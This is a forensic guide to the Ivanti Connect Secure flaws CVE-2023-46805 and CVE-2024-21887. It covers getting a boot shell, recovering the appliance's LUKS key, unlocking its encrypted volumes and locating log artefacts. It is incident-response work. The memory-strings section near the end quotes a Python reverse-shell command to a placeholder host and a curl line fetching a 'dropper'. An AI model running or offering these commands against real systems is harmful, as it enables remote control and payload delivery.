Ivanti Connect Secure Authentication Bypass (CVE-2023-46805) and Command Injection (CVE-2024-21887)

This article provides guidance on inspecting and analysing disk images and memory from a virtual Ivanti Connect Secure appliance, in response to CVE-2023-46805 and CVE-2024-21887.

On 10th January 2024, Volexity posted an article[1] advising they had identified active in-the-wild exploitation of two zero-day vulnerabilities affecting Ivanti's Connect Secure (ICS) product.

On 12th January 2024, Mandiant added to the public discussion with an article[2] of their own.

Based on the above articles, we deployed a vulnerable Ivanti Connect Secure appliance (v22.3R1, build 1647) and tested publicly available proofs of concept to understand where artefacts may reside, in order to support forensic analysis.

This article does not reference indicators of compromise; please check the blog posts by Volexity[1], Mandiant[2], and Rapid7[6]. Please also follow the mitigation advice from Ivanti[7] and watchTowr[8].

This article assumes you have a virtual appliance, have followed your incident response process, and have preserved system snapshots (including memory dumps) and disk images.

(If you're performing this on Hyper-V or ESXi, simply create a snapshot, export the resultant virtual disks and .vmem files, and copy them to your analysis environment.)
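If your analysis tooling prefers raw images, the exported VMDK can be converted with qemu-img; the filenames here are illustrative:

$ qemu-img convert -f vmdk -O raw ics-disk.vmdk ics-disk.raw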

Inspecting the Disk Image

A single VMDK was subject to analysis. Not knowing the filesystem, we initially inspected the disk using FTK Imager on a Windows host. This indicated (as shown in the screenshot) a series of partitions of various sizes, with varying filesystems. We immediately felt there were similarities between the ICS appliance and the Citrix ADC appliance, namely that it is likely based on BSD/FreeBSD, but this required further digging.

Expanding the 'unpartitioned space [LVM2]' node revealed physical volume (PV) groups. Each folder contains relevant metadata and LVM configuration data, such as the volume group ID, format, and underlying partitions (i.e. which physical volume/partition they relate to).

Upon inspecting groupA-runtime, groupZ-home, etc., we could see indications that LUKS was in use. This throws a spanner in the works, as we don't know any of the protectors. (If you need a refresher or some test disk images for LVM and LUKS, head over to ext4, LVM, and LUKS1/LUKS2.)

So we have a virtual disk containing multiple partitions of an unknown filesystem, and we need a key to decrypt the LUKS volumes before we can reassemble and mount them.

A Black Hat resource[3] authored by Orange Tsai and Meh Chang came in rather handy. (If Orange's name is familiar, have a look at the history behind ProxyShell.) The slides suggest that if you append init=//bin/sh to the kernel line in the GRUB bootloader, you can spawn a shell during boot. We added that, pressed F10 to boot with the new options, and had a shell.
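For illustration, the edited kernel line in the GRUB editor might look something like the following; every parameter except the appended init= option is hypothetical here:

linux /vmlinuz root=/dev/ram0 quiet init=//bin/sh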

We know LVM/mdadm config is usually in /etc, so this is the first place we look. We see /etc/lvmkey, so let's see what it contains. Executing cat lvmkey distorts the screen, throws characters everywhere, and makes the terminal unusable, as the key is raw binary. With only limited command-line tools available there's no real way to copy the key other than cat, so we re-ran it as cat -v to render the non-printable bytes in M- notation.
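If the recovery shell happens to include od (many minimal environments do, via busybox), dumping the key as hex sidesteps the terminal corruption entirely and is worth trying first:

$ od -An -tx1 /etc/lvmkey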

This Stack Overflow answer[4] provides a decoding table for the values above, which convert to b99ecf89754ec76018ca0eda5d6ac7. The next step is to convert that into a keyfile so we can use it to decrypt our LUKS volumes. (If this were a simple password, you could instead attempt to mount the volume and enter the passphrase interactively[5].)
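As a quick illustration of the notation: cat -v renders any byte with the high bit set as M- followed by the corresponding 7-bit character, so 0xb9 (0x80 + 0x39, i.e. '9') appears as M-9:

$ printf '\xb9' | cat -v
M-9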

Convert the hex string into raw bytes so we can use it as a keyfile:

$ echo -n b99ecf89754ec76018ca0eda5d6ac7 | xxd -r -p - > lvmkey

... which turns out to be incorrect: the decoded key is a byte short of the full 16-byte key, so the resultant lvmkey is wrong.

It was about this time that we were provided with Rapid7's technical analysis[6], which ultimately saved a lot of time, as we would otherwise have gone down a rabbit hole. The arguments originally used with cat (-v) weren't sufficient, as there is a special character at the beginning of the key: a 0x0a (newline) byte, which cat renders as an actual line break rather than an escape. This is why there is a new line between the command and M-9. The correct key is 0ab99ecf89754ec76018ca0eda5d6ac7.

$ echo -n 0ab99ecf89754ec76018ca0eda5d6ac7 | xxd -r -p - > lvmkey
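A quick sanity check: the keyfile should be exactly 16 bytes, beginning with the 0x0a byte:

$ xxd lvmkey
00000000: 0ab9 9ecf 8975 4ec7 6018 ca0e da5d 6ac7  .....uN.`....]j.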

Now we need to either mount the VMDK inside our VM, or attach it externally as a new disk.
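If you'd rather not attach it via the hypervisor, qemu-nbd can expose the VMDK as a block device; the device node and filename are illustrative:

$ modprobe nbd max_part=16            # load the network block device driver
$ qemu-nbd --connect=/dev/nbd0 ics-disk.vmdk
$ partprobe /dev/nbd0                 # re-read the partition table

In our case, the disk was attached as a second disk and appeared as /dev/sdc: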

$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sdc       8:32   0   40G  0 disk
├─sdc1    8:33   0 70.6M  0 part
├─sdc2    8:34   0 70.6M  0 part
├─sdc3    8:35   0 70.6M  0 part
├─sdc4    8:36   0    1K  0 part
├─sdc5    8:37   0    3G  0 part
├─sdc6    8:38   0    4G  0 part
├─sdc7    8:39   0  8.3G  0 part
├─sdc8    8:40   0    4G  0 part
├─sdc9    8:41   0  8.3G  0 part
├─sdc10   8:42   0  3.9G  0 part
└─sdc11   8:43   0  8.3G  0 part

Identify volume groups (vgs) and logical volumes (lvs) so we can attempt to mount them.

$ vgs
  VG     #PV #LV #SN Attr   VSize  VFree
  groupA   2   2   0 wz--n- 12.30g    0
  groupS   1   1   0 wz--n-  3.90g    0
  groupZ   1   1   0 wz--n-  3.00g    0
  
$ lvs
  LV      VG     Attr       LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync Convert
  home    groupA -wi-a----- 3.50g
  runtime groupA -wi-a----- 8.80g
  swap    groupS -wi-a----- 3.90g
  home    groupZ -wi-a----- 3.00g
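pvs completes the picture by showing which physical partitions back each volume group:

$ pvs -o pv_name,vg_name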

We need to activate each of the volume groups (groupA, S, Z) so we can map them (-a controls activation; the y argument means yes/activate):

$ vgchange -ay groupA
  2 logical volume(s) in volume group "groupA" now active
$ vgchange -ay groupS
  1 logical volume(s) in volume group "groupS" now active
$ vgchange -ay groupZ
  1 logical volume(s) in volume group "groupZ" now active
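(As a shortcut, running vgchange -ay with no volume group name activates every group LVM can see in one go.)

$ vgchange -ay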

Now we can see that the partitions within our block device (/dev/sdc) are identified as LVM members:

$ lsblk
NAME               MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sdc                  8:32   0   40G  0 disk
├─sdc1               8:33   0 70.6M  0 part
├─sdc2               8:34   0 70.6M  0 part
├─sdc3               8:35   0 70.6M  0 part
├─sdc4               8:36   0    1K  0 part
├─sdc5               8:37   0    3G  0 part
│ └─groupZ-home    253:3    0    3G  0 lvm
├─sdc6               8:38   0    4G  0 part
│ ├─groupA-home    253:0    0  3.5G  0 lvm
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
├─sdc7               8:39   0  8.3G  0 part
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
├─sdc8               8:40   0    4G  0 part
├─sdc9               8:41   0  8.3G  0 part
├─sdc10              8:42   0  3.9G  0 part
│ └─groupS-swap    253:2    0  3.9G  0 lvm
└─sdc11              8:43   0  8.3G  0 part

Our logical volumes are also visible under /dev/mapper:

$ ls -l /dev/mapper
groupA-home -> ../dm-0
groupA-runtime -> ../dm-1
groupS-swap -> ../dm-2
groupZ-home -> ../dm-3

Confirming we can't simply mount each logical volume, as it's protected by LUKS:

$ mount /dev/groupA/home /mnt/tmp
mount: /mnt/tmp: unknown filesystem type 'crypto_LUKS'.
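Before opening them, you can confirm the LUKS format and inspect the header (cipher, key slots, etc.):

$ cryptsetup luksDump /dev/groupA/home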

Open each /dev/group* logical volume with cryptsetup, supplying the keyfile and a corresponding mapper name:

$ ls /dev/group*
/dev/groupA:
home  runtime

/dev/groupS:
swap

/dev/groupZ:
home

$ cryptsetup luksOpen -d lvmkey /dev/groupA/home ivanti1
$ cryptsetup luksOpen -d lvmkey /dev/groupA/runtime ivanti2
$ cryptsetup luksOpen -d lvmkey /dev/groupS/swap ivanti3
$ cryptsetup luksOpen -d lvmkey /dev/groupZ/home ivanti4

You can see how we've gone from raw block devices, to VGs/LVs, and now to opened crypt devices.

$ lsblk
NAME               MAJ:MIN RM  SIZE RO TYPE  MOUNTPOINTS
sdc                  8:32   0   40G  0 disk
├─sdc1               8:33   0 70.6M  0 part
├─sdc2               8:34   0 70.6M  0 part
├─sdc3               8:35   0 70.6M  0 part
├─sdc4               8:36   0    1K  0 part
├─sdc5               8:37   0    3G  0 part
│ └─groupZ-home    253:3    0    3G  0 lvm
│   └─ivanti4      253:7    0    3G  0 crypt
├─sdc6               8:38   0    4G  0 part
│ ├─groupA-home    253:0    0  3.5G  0 lvm
│ │ └─ivanti1      253:4    0  3.5G  0 crypt
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
│   └─ivanti2      253:5    0  8.8G  0 crypt
├─sdc7               8:39   0  8.3G  0 part
│ └─groupA-runtime 253:1    0  8.8G  0 lvm
│   └─ivanti2      253:5    0  8.8G  0 crypt
├─sdc8               8:40   0    4G  0 part
├─sdc9               8:41   0  8.3G  0 part
├─sdc10              8:42   0  3.9G  0 part
│ └─groupS-swap    253:2    0  3.9G  0 lvm
│   └─ivanti3      253:6    0  3.9G  0 crypt
└─sdc11              8:43   0  8.3G  0 part

We also have corresponding mapper entries under /dev/mapper for ivanti[1..4]:

$ ls /dev/mapper
ivanti1  ivanti2  ivanti3  ivanti4

Now we need to create mount points and then mount each decrypted volume:

$ mkdir /mnt/ivanti{1..4}
$ mount /dev/mapper/ivanti1 /mnt/ivanti1
$ mount /dev/mapper/ivanti2 /mnt/ivanti2
$ mount /dev/mapper/ivanti3 /mnt/ivanti3
$ mount /dev/mapper/ivanti4 /mnt/ivanti4
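Note: if you're working against original evidence rather than a disposable copy, consider mounting read-only instead:

$ mount -o ro /dev/mapper/ivanti1 /mnt/ivanti1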

$ ls /mnt/ivanti1
boot  lost+found  root

$ ls /mnt/ivanti2
ace  cores  extra-sw  gs_files  local  lost+found  pkg  runtime  snmpconf  snmpd.spec.cfg  sysconf  tmp  upgradelogs  var  versions

$ ls /mnt/ivanti3
analytics.log                                dscsd.statementcounters             dsserver.statementcounters           iptable_checkResult                           sbrhealth
attackaudit-server.statementcounters         dsdashserver.statementcounters      dsserver-tasks.pl.statementcounters  iptable_result                                sbrnotify.exclusion
browse-server.statementcounters              dsdashsummary.statementcounters     dsstartfb.statementcounters          ive.ovfEnv                                    sbrnotify.statementcounters
cache_server.statementcounters               dsdbglogd.statementcounters         dsstartguacd.statementcounters       iveradius.exclusion                           scanner
cgi-errors                                   dsevntd.statementcounters           dsstartkwatchdog.statementcounters   libevntd.statementcounters                    sessionserver.statementcounters
cgi-server.statementcounters                 dsidpmonitor.statementcounters      dsstartnis.statementcounters         licenseMightHaveChanged.pl.statementcounters  smbconf.statementcounters
checkWinbinddProcesses.pl.statementcounters  dsinvoked.statementcounters         dsstartws.statementcounters          lmdbccerr                                     smbmon.statementcounters
cmdmmap.sMxNw2                               dsjavad.statementcounters           dsstatdump.statementcounters         namecoordinatord.statementcounters            startVmwareGuestd.pl.statementcounters
CpuStatus                                    dsksyslog.statementcounters         dssyslogfwd.statementcounters        nameserverd.statementcounters                 stats
dhcpProxy.statementcounters                  dslicenseclientd.statementcounters  dssyslogfwd_zmq_sock                 notification                                  svb
dhcpreq-ext0.log                             dsliveupdate.statementcounters      dssysmonitord.statementcounters      numlineevlog                                  tmp
dhcpreq-int0.log                             dslmdbcheck.statementcounters       dstaillog.statementcounters          out.log                                       Tncshealth
dmi-server.statementcounters                 dslogserver.statementcounters       dsterminald.statementcounters        parevntd.statementcounters                    tncs.statementcounters
dns_cache.statementcounters                  dsmdm.statementcounters             dsvlsHeartBeat.statementcounters     perl.statementcounters                        updateLinkLocalAddress.pl.statementcounters
dsacpiwatch.statementcounters                dsnetd.statementcounters            dswatchdogng.statementcounters       pssaml.statementcounters                      vmware-root
dsagentd.statementcounters                   dsnicsorter.statementcounters       EGG-INFO                             pushconfig.util                               watchdog.statementcounters
dsclusinfod.statementcounters                dsnodemon.statementcounters         eventd.statementcounters             pyeventhandler.statementcounters              web80.statementcounters
dscockpitd.statementcounters                 dspasschanged.statementcounters     fqdnacl.statementcounters            pythoneventhandler                            web.statementcounters
dsconfig.pl.statementcounters                dspushserver.statementcounters      have_many_opened_files               radius.statementcounters                      zeromq
dscpumond.statementcounters                  dsradiusacct.statementcounters      hsperfdata_root                      res_utilization
dscrld.statementcounters                     dssensord.statementcounters         html5acc-server.statementcounters    saml-metadata-server.statementcounters

$ ls /mnt/ivanti4
bin  boot  dbg  dev  etc  grub-2  lib  lost+found  mnt2  modules  pkg  proc  sbin  sys  tmp  usr  va

We used Rapid7's public PoC to simulate an attack on a fresh Ivanti appliance and generate artefacts: spawning a reverse shell, transferring files to a remote host, exploring the file system, and so on.

At the time of writing, we were only able to find memory-resident artefacts relating to the shell itself and possible commands.

Possible Artefact Locations

Location: ivanti2/runtime/logs/log.admin.vc0
Contents: Console logins from foreign/remote IP addresses, user-agent data, username information, ICS appliance SSL information

Location: ivanti2/runtime/logs/log.events.vc0
Contents: As above

Location: ivanti2/runtime/system.j
Contents: Remote IP address entries relating to incoming connections
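The .vc0 logs are not plain text, but running strings over them and grepping may still surface IP addresses and user-agent data; the search term below is illustrative:

$ strings /mnt/ivanti2/runtime/logs/log.admin.vc0 | grep -i 'user-agent'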

Relevant Memory Strings (if you don't have a Volatility profile)

python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
/home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh",
/bin/sh

Remember, if you're running strings output through grep, use -A (after) and -B (before) to show a given number of lines of context around a match (see PIDs 4753 and 4756 below).
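For example, a minimal sketch (the memory image filename and search term are illustrative):

$ strings ics-memory.vmem | grep -B 6 -A 4 'AwsAzureTestConnection'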

--
 2958  2722  0.3  0.6 98836 186616 55684 S radius -debug -d.
 2997     1  0.0  0.0   696   9184   400 S smbserver
 2998  2997  0.0  0.0  1496  10008  4416 S smbserver
 4132  2186  0.0  0.5  6820  76732 43596 S /home/ecbuilds/int-rel/sa/22.3/bld1647.1/install/bin/saml-server ssoservice --dspar 27 98
 4133  4132  0.0  0.2  6820  76732 22988 S /home/ecbuilds/int-rel/sa/22.3/bld1647.1/install/bin/saml-server ssoservice --dspar 27 98
 4753  2852  0.0  0.0   452   4852  3744 S /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh",
 4756  4753  0.0  0.1  2296   9532  8208 S python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
 4757  4756  0.0  0.0   460   4860  3848 S /bin/sh -i
 4762     2  0.0  0.0     0      0     0 I [kworker/u8:2]
 6510  2320  0.0  0.2  5308  60356 23548 S /home/ecbuilds/int-rel/sa/22.3/bld1647.1/install/bin/parevntd
 6543     2  0.0  0.0     0      0     0 I [kworker/u8:0]
--

/perl5/bin/somereallybadcommand
/perl5/bin/curl -ik https://remoteurl.xyz/dropper

References:

[1] Volexity; https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

[2] Mandiant; https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day

[3] Black Hat; https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf

[4] Stack Overflow; https://stackoverflow.com/questions/44694331/what-is-the-m-notation-and-where-is-it-documented/44952259#44952259

[5] HowtoForge; https://www.howtoforge.com/automatically-unlock-luks-encrypted-drives-with-a-keyfile

[6] Rapid7 (AttackerKB); https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis

[7] Ivanti; https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

[8] watchTowr; https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/

NIST; CVE-2023-46805; https://nvd.nist.gov/vuln/detail/CVE-2023-46805

NIST; CVE-2024-21887; https://nvd.nist.gov/vuln/detail/CVE-2024-21887
